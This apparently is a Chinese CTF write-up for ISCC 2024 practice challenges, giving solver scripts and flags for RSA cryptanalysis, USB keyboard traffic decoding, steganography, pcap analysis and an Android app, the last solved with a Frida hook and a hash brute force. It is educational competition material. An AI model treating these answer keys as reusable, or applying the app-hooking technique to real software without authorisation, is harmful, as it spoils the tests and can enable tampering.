'''n-(p-2)*(q-1)=pq-(pq-p-2q+2)=p+2q-2 ①
n-(p-1)*(q-2)=pq-(pq-2p-q+2)=2p+q-2 ②
①+②:n-(p-2)*(q-1)+n-(p-1)*(q-2)=3*(p+q)-4
p+q=(n-(p-2)*(q-1)+n-(p-1)*(q-2)+4)/3'''
phi=n-ppq+1 #phi=(p-1)*(q-1)=pq-(p+q)+1
d=gmpy2.invert(e,phi)
flag=long_to_bytes((pow(c,d,n)))
print(flag)
ISCC{zXKlYgKNvNEoF3dEkC--}
时间刺客:
2024年10月14日早8点,小明敲键盘时候解出了flag
使用键盘流量分析常用的两个脚本脚本分别是增加冒号的脚本和键盘解密脚本
f=open('6.txt','r')
fi=open('out.txt','w')
while 1:
a=f.readline().strip()
if a:
if len(a)==16:
out=''
for i in range(0,len(a),2):
if i+2 != len(a):
out+=a[i]+a[i+1]+":"
else:
out+=a[i]+a[i+1]
fi.write(out)
fi.write('\n')
else:
break
fi.close()
normalKeys = {
"04": "a", "05": "b", "06": "c", "07": "d", "08": "e",
"09": "f", "0a": "g", "0b": "h", "0c": "i", "0d": "j",
"0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o",
"13": "p", "14": "q", "15": "r", "16": "s", "17": "t",
"18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y",
"1d": "z", "1e": "1", "1f": "2", "20": "3", "21": "4",
"22": "5", "23": "6", "24": "7", "25": "8", "26": "9",
"27": "0", "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t",
"2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[", "30": "]", "31": "\\",
"32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",", "37": ".",
"38": "/", "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>",
"3e": "<F5>", "3f": "<F6>", "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>",
"44": "<F11>", "45": "<F12>"}
shiftKeys = {
"04": "A", "05": "B", "06": "C", "07": "D", "08": "E",
"09": "F", "0a": "G", "0b": "H", "0c": "I", "0d": "J",
"0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O",
"13": "P", "14": "Q", "15": "R", "16": "S", "17": "T",
"18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y",
"1d": "Z", "1e": "!", "1f": "@", "20": "#", "21": "$",
"22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")",
"28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>",
"2d": "_", "2e": "+", "2f": "{", "30": "}", "31": "|", "32": "<NON>", "33": "\"",
"34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?", "39": "<CAP>", "3a": "<F1>",
"3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>", "40": "<F7>",
"41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
output = []
keys = open('out.txt')
for line in keys:
try:
if line[0] != '0' or (line[1] != '0' and line[1] != '2') or line[3] != '0' or line[4] != '0' or line[
9] != '0' or line[10] != '0' or line[12] != '0' or line[13] != '0' or line[15] != '0' or line[16] != '0' or \
line[18] != '0' or line[19] != '0' or line[21] != '0' or line[22] != '0' or line[6:8] == "00":
continue
if line[6:8] in normalKeys.keys():
output += [[normalKeys[line[6:8]]], [shiftKeys[line[6:8]]]][line[1] == '2']
else:
output += ['[unknown]']
except:
pass
keys.close()
flag = 0
print("".join(output))
for i in range(len(output)):
try:
a = output.index('<DEL>')
del output[a]
del output[a - 1]
except:
pass
for i in range(len(output)):
try:
if output[i] == "<CAP>":
flag += 1
output.pop(i)
if flag == 2:
flag = 0
if flag != 0:
output[i] = output[i].upper()
except:
pass
print('output :' + "".join(output))
#flagpr3550nwardsa2fee6e0
使用pr3550nwardsa2fee6e0
密码解密第一层密码,发现还有一层密码猜测是第一层大写PR3550NWARDSA2FEE6E0
密码,解开压缩包后发现全部是空文件
直接写个脚本根据提示的时间转换为时间截后减去第一个txt
文件得到了t
写个循环脚本
import time
import os
os.chdir("C:/Users/Admin/Desktop/3")
dt="2024-10-14 8:00:00"
time1 = time.strptime(dt, "%Y-%m-%d %H:%M:%S")
t = time.mktime(time1)
flag = ""
for i in range(18):
mtime = os.path.getmtime(".%s.txt" % i)
flag+=chr(int(mtime-t))
print('ISCC'+flag+'}')
#ISCCttJpLr7uSlNWmlcsu5}
ISCCttJpLr7uSlNWmlcsu5}
工业互联网模拟仿真数据分析:
第一问:
在某些网络会话中,数据包可能保持固定大小,请给出含有此确定性特征的会话IP地址和数据包字节大小值。
答案:IP地址:XX.XX.XX.XX,XX.XX.XX.XX,…,数值:XX
补充说明:IP顺序从小到大排列,涉及的IP个数由选手自己判断
这两个IP Lengit 不变 所以是192.168.1.2,192.168.1.4,24
第二问:
题目二:通信包数据某些字段可能为确定的,请给出确定字节数值。
2024 是不变的
第三问:
一些网络通信业务在时间序列上有确定性规律,请提供涉及的IP地址及时间规律数值(小数点后两位)
答案:IP地址:XX.XX.XX.XX,XX.XX.XX.XX,…,数值:XX
192.168.1.3,192.168.1.5,0.06
第四问:
一些网络通信业务存在逻辑关联性,请提供涉及的IP地址
答案:XX.XX.XX.XX,XX.XX.XX.XX,…
192.168.1.2,192.168.1.3,192.168.1.6
第五问:
网络数据包往往会添加数据完整性校验值,请分析出数据校验算法名称及校验值在数据包的起始位和结束位(倒数位)
答案:XXXXX,X,X
五个字符的校验算法,先假设是 CRC16
或者 CRC32
倒数位必为1
尝试CRC16 CRC32
并尝试0-10
为起始位为CRC16,4,1
时成功提交
adcca5c2a82064a17a645d35b6b054cd
Number_is_the_key:
The answers to the questions are hidden in the numbers.
查找内容设置为 加粗替换背景为黑色然后宽设置为2
能看到二维码即可QR
扫码即可
ISCC{GVTpapvK4URv}
Where_is_the_flag:
The flag is hidden, please find where it is.
因为拿到是pyc
文件想到 反编译 网站如下:
https://tool.lu/pyc/ 在线反编译 得到源码:
这里发现少了Key
猜测是pyc
隐写,可以想到一个工具:stegosaurus
得到key
github:https://github/AngelKitty/stegosaurus
https://github/AngelKitty/stegosaurus/releases/tag/1.0
根据源码拼接key+n0lve3t6r1s
就是密钥 然后使用CyberChef
解密
#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 3.6
from Crypto.Cipher import AES
import binascii
def decrypt(x, cipher):
key = x + 'n0lve3t6r1s'
try:
aes = AES.new(key.rjust(24, 'A'), AES.MODE_ECB)
cipher = binascii.unhexlify(cipher)
flag = aes.decrypt(cipher).decode()
return flag
return flag
return None
def main():
c = '19c26b345a14cd47256660c4e59bc06e5a690b243d5e7a8124e052f9c696cf7f'
k = input('Please input your key: ')
flag = decrypt(k, c)
if 'flag' in flag:
print('Wow, you find it!!!')
else:
print('Oh no!!!')
if __name__ == '__main__':
main()
ISCC{HRFhOEVnmYaWpCAlQbvv}
FunZip:
P神工具一把嗦
ISCC{5qwr8fmCWBml}
钢铁侠在解密:
这天钢铁侠在自己的相册旁边发现了一张字条,他觉得两个message之间指定有点东西~
一张图和txt txt
文件只有n,e,a
和明文缺少c
猜测在bmp
图片隐写中
C1: 4841465525479094858283249913093588336405819692308992568815184984112142418516177281822291700247857313592879124655111450087675853315953121557569119764279557420900019093250258905485330774772156753506410582545416313878424374296480809619953573866895931450358886231958808469996900225946690261432246769242343939498210979161789744523341971605843150719502298366196330610146975380801166194672726386693133975617180349325263716118285867965741579544907574045647520194314620320401553744843164380479971548126593862313635648696740770059135901431993637720626149085420658462322834506181786702083554721226224523151123254278576893159186
C2: 5835938090203268698567584380581310591628277964719453050511131911277282207654259992708764607801816713560015566066119496307687980331966833600989907293172794136413796936766710587427367852306457985731545289398788122273953222283463399254547234781540202329989694132482501212976801751141793449773275904213309398787034948246876351474180337636417790039597932073225708020713286212020748023673701454001021926972023403315819235492701799740801495667705207588139623609095479304089261489994718166209661362014609424890914080703203519320401908642177899542410202249173104050860899924682948417931795056415821349886915984779132050096424
使用silenteye
提取c
🆗现在知道了所有的值 编写脚本:
#half-gcd算法
def HGCD(a, b):
if 2 * b.degree() <= a.degree() or a.degree() == 1:
return 1, 0, 0, 1
m = a.degree() // 2
a_top, a_bot = a.quo_rem(x ^ m)
b_top, b_bot = b.quo_rem(x ^ m)
R00, R01, R10, R11 = HGCD(a_top, b_top)
c = R00 * a + R01 * b
d = R10 * a + R11 * b
q, e = c.quo_rem(d)
d_top, d_bot = d.quo_rem(x ^ (m // 2))
e_top, e_bot = e.quo_rem(x ^ (m // 2))
S00, S01, S10, S11 = HGCD(d_top, e_top)
RET00 = S01 * R00 + (S00 - q * S01) * R10
RET01 = S01 * R01 + (S00 - q * S01) * R11
RET10 = S11 * R00 + (S10 - q * S11) * R10
RET11 = S11 * R01 + (S10 - q * S11) * R11
return RET00, RET01, RET10, RET11
def GCD(a, b):
print(a.degree(), b.degree())
q, r = a.quo_rem(b)
if r == 0:
return b
R00, R01, R10, R11 = HGCD(a, b)
c = R00 * a + R01 * b
d = R10 * a + R11 * b
if d == 0:
return c.monic()
q, r = c.quo_rem(d)
if r == 0:
return d
return GCD(d, r)
c1=4841465525479094858283249913093588336405819692308992568815184984112142418516177281822291700247857313592879124655111450087675853315953121557569119764279557420900019093250258905485330774772156753506410582545416313878424374296480809619953573866895931450358886231958808469996900225946690261432246769242343939498210979161789744523341971605843150719502298366196330610146975380801166194672726386693133975617180349325263716118285867965741579544907574045647520194314620320401553744843164380479971548126593862313635648696740770059135901431993637720626149085420658462322834506181786702083554721226224523151123254278576893159186
c2=5835938090203268698567584380581310591628277964719453050511131911277282207654259992708764607801816713560015566066119496307687980331966833600989907293172794136413796936766710587427367852306457985731545289398788122273953222283463399254547234781540202329989694132482501212976801751141793449773275904213309398787034948246876351474180337636417790039597932073225708020713286212020748023673701454001021926972023403315819235492701799740801495667705207588139623609095479304089261489994718166209661362014609424890914080703203519320401908642177899542410202249173104050860899924682948417931795056415821349886915984779132050096424
N=14333611673783142269533986072221892120042043537656734360856590164188122242725003914350459078347531255332508629469837960098772139271345723909824739672964835254762978904635416440402619070985645389389404927628520300563003721921925991789638218429597072053352316704656855913499811263742752562137683270151792361591681078161140269916896950693743947015425843446590958629225545563635366985228666863861856912727775048741305004192164068930881720463095045582233773945480224557678337152700769274051268380831948998464841302024749660091030851843867128275500525355379659601067910067304244120384025022313676471378733553918638120029697
e = 52595
a=1
M1 = 1769169763
M2 = 1735356260
PR.<x>=PolynomialRing(Zmod(N))
g1 = (x*2^32+M1)^e - c1
g2 = (x*2^32+M2)^e - c2
res = GCD(g1,g2)
m = -res.monic().coefficients()[0]
print(bytes.fromhex(hex(m)[2:]))
#flag{{chu_sheng_ru_si_288}}
这里使用SageMath
运行一下代码 python
缺少函数 运行会报错。
ISCC{chu_sheng_ru_si_288}
成语学习:
我把学习资料拷贝给你一份
筛选HTTP
协议发现一个数据包另存为导出 搜索89504e47
复制下面全部红色即可。
宽高工具一把梭得到压缩包密码:57pmYyWt
解压成功放入HxD
发现是数据包修改后缀zip
,直接搜flag
Hmacmd5
加密 密文,道法自然 密钥:peach
ISCC{1da6e014532415035d397bea9f238feb}
精装四合一:
分离,我们是破碎的;团结,我们将成为神。我们终将在二进制的反复与隐藏之中破解自身的密码
下载得到4
个图片,然后使用winhex
或者010editor
把正常图片数据删去
(即下图中AE 42 60 82
及之前的数据)然后得到一系列冗余数据,然后依次打开,异或0xff
异或最快速的方法可以使用010editor:
十六进制然后点击二进制异或)
然后就是依次把数据提取出来
(他是把一个zip
数据,均匀分布到4
个文件里,那么我们需要依次读取4
个文件)
下面是py
脚本生成zip
:
fp1 = open('1.png','rb')
fp2 = open('2.png','rb')
fp3 = open('3.png','rb')
fp4 = open('4.png','rb')
fp5 = open('5.zip','wb')
#如果是4b,就是2.png
#如果是03,就是3.png
#如果是04,就是4.png
for i in range(3176):
fp5.write(fp1.read(1))
fp5.write(fp2.read(1))
fp5.write(fp3.read(1))
fp5.write(fp4.read(1))
fp5.write(fp1.read())
from Crypto.Util.number import bytes_to_long, long_to_bytes
import gmpy2
e = 65537
n = 16920251144570812336430166924811515273080382783829495988294341496740639931651
p = 167722355418488286110758738271573756671
q = 100882503720822822072470797230485840381
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
# 读取加密的文件
c = bytes_to_long(open('true_flag.jpeg', 'rb').read())
# 解密
m = pow(c, d, n)
# 将解密后的明文保存到文件
print(long_to_bytes(m))
print(c)
ISCC{N8KQoc6ULLsuIXJ}
Mobile:
Puzzle_Game:
这是一道关于解密的题目,快来试试吧!
使用Frida
将脚本注入到Android
目标进程,获取到flag
function main() {
Java.perform(function () {
let Myjni = Java.use("com.example.whathappened.MyJNI.Myjni");
Myjni["getstr"].implementation = function () {
let result = this["getstr"]();
console.log(`${result}`);
return result;
};
});
}
setImmediate(main);
爆破flag
其余位数
import hashlib
from itertools import product
from string import digits
def get_sha256(s):
return hashlib.sha256(s.encode('utf-8')).hexdigest()
for digits in product(digits, repeat=8):
guess = ''.join(digits) + "gwC9nOCNUhsHqZm"
digest = get_sha256(guess)
if digest ==
'437414687cecdd3526281d4bc6492f3931574036943597fddd40adfbe07a9afa':
print(digest)
print('found', guess)
break
模拟 Receiver
类 方法
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.Random;
public class Test {
private static String combineStrings(String arg1, String arg2) {
return arg1 + arg2;
}
private static byte[] customEncrypt(byte[] arg4, byte[] arg5) {
byte[] v0 = new byte[arg4.length];
int v1;
for(v1 = 0; v1 < arg4.length; ++v1) {
v0[v1] = (byte)(arg4[v1] ^ arg5[v1 % arg5.length]);
}
return v0;
}
public static String encrypt(String arg3, String arg4) {
byte[] v0 = generateSalt(16);
byte[] v3 = customEncrypt(combineStrings(arg3, arg4).getBytes(StandardCharsets.UTF_8), v0);
byte[] v4 = new byte[v0.length + v3.length];
System.arraycopy(v0, 0, v4, 0, v0.length);
System.arraycopy(v3, 0, v4, v0.length, v3.length);
return Base64.getEncoder().encodeToString(v4);
}
public static String encrypt2(String arg3) {
byte[] v3 = arg3.getBytes(StandardCharsets.UTF_8);
int v0 = 0;
int v1;
for(v1 = 0; v1 < v3.length; ++v1) {
v3[v1] = (byte)((v3[v1] + 0x7F) % 0x100);
}
byte[] v1_1 = new byte[v3.length];
while(v0 < v3.length) {
v1_1[v0] = (byte)(v0 % 2 == 0 ? v3[v0] ^ 0x7B : v3[v0] ^ 0xEA);
++v0;
}
return Base64.getEncoder().encodeToString(v1_1);
}
private static byte[] generateSalt(int i) {
byte[] bArr = new byte[i];
new Random(3468L).nextBytes(bArr);
return bArr;
}
public static void main(String[] args) {
System.out.println("ISCC{"+encrypt2(encrypt("04999999", "gwC9nOCNUhsHqZm")).substring(0, 32)+"}");
}
}
ISCC{tS+dAMpEvBi3LrcTiweLJIguyESqHJwY}
版权声明:本文标题:2024年ISCC练武题部分WriteUp 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dianzi/1727845191a1133006.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论